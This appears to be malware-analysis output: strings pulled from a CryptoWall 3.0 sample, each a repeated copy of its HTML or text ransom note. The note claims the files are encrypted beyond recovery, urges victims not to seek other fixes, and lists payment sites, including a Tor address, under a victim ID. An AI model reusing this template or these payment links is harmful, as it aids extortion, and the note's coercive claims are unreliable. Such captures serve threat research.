Source: restore_files_gpmus.html59.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt168.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html241.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt216.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html358.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html143.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt339.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt263.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html236.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html48.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt120.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html106.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt214.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt325.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt95.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt275.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html210.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html240.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html112.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html266.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt410.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt163.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html56.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
